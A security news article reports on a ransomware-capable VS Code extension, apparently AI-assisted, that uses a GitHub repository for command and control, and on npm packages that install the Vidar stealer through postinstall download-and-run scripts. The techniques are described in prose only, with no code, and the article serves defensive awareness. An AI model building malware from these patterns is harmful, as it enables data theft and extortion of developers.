Content
Cybersecurity researchers have uncovered a malicious Visual Studio Code (VS Code) extension named "susvsex" that possesses rudimentary ransomware capabilities. This extension, believed to have been created with the assistance of artificial intelligence—often referred to as 'vibe-coded' malware—was flagged by Secure Annex researcher John Tuckner. Interestingly, the extension does not try to conceal its malicious nature. It was uploaded on November 5, 2025, by a user calling themselves "suspublisher18" with a minimalistic description, "Just testing," and an obviously fake email address: "donotsupport@example.com." The extension’s stated functionality is to automatically zip, upload, and encrypt files from a predefined directory (C:\Users\Public\testing on Windows or /tmp/testing on macOS) upon its first launch.
Microsoft acted quickly and by November 6 had already removed the extension from the official VS Code Marketplace. The extension’s core malicious routine, called "zipUploadAndEncrypt," activates automatically on any trigger event such as installation or launch of VS Code. This function compresses a target folder into a ZIP archive, sends it to a remote server, and then encrypts the files in that directory, making them inaccessible without the decryption key. Fortunately, the targeted directory is set to a test staging folder by default, which limits current damage but could easily be changed with a future update or via commands sent over a covert command-and-control (C2) channel.
Speaking of C2, the malware cleverly uses GitHub repositories as its command center. It periodically polls a private GitHub repository for new commands by reading an "index.html" file and writes back execution results into a "requirements.txt" file using a hardcoded GitHub access token embedded in the extension. The linked GitHub account, "aykhanmv," remains active, with the developer claiming to be based in Baku, Azerbaijan. Detailed comments, README files with execution instructions, and placeholder variables left in the code hint strongly at AI-assisted creation, or 'vibe coding.' In a blunder, the extension’s package mistakenly included crucial components such as decryption tools, server code, and GitHub tokens, potentially allowing others to hijack the C2 infrastructure.
In a related discovery, Datadog Security Labs identified 17 malicious npm packages that masquerade as legitimate software development kits (SDKs). These packages, uploaded between October 21 and October 26, 2025, by accounts named "aartje" and "saliii229911," stealthily install the Vidar information stealer on compromised systems. This marks the first time Vidar has been distributed through the npm registry. Although the accounts were quickly banned, the packages had already been downloaded over 2,200 times, with many downloads possibly due to automated scrapers.
The attack mechanism within these npm packages relies on postinstall scripts defined in their "package.json" files. These scripts download a ZIP archive from an external server and execute the Vidar malware contained inside. Variants use different methods: some execute a PowerShell script before running JavaScript to complete the infection chain. Vidar samples analyzed by Datadog use hardcoded Telegram and Steam accounts as dead-drop points to locate the actual command servers. Researchers speculate that the differing postinstall implementations help evade detection by varying behavioral signatures.
These incidents add to a growing list of supply chain attacks targeting open-source ecosystems like npm, PyPI, RubyGems, and Open VSX. They highlight the critical importance for developers to exercise caution, review changelogs carefully, and be aware of common attack vectors such as typosquatting and dependency confusion when incorporating third-party packages. The rise in AI-assisted malware development and increasingly sophisticated supply chain compromises underscore an urgent need for enhanced security practices across software development communities.
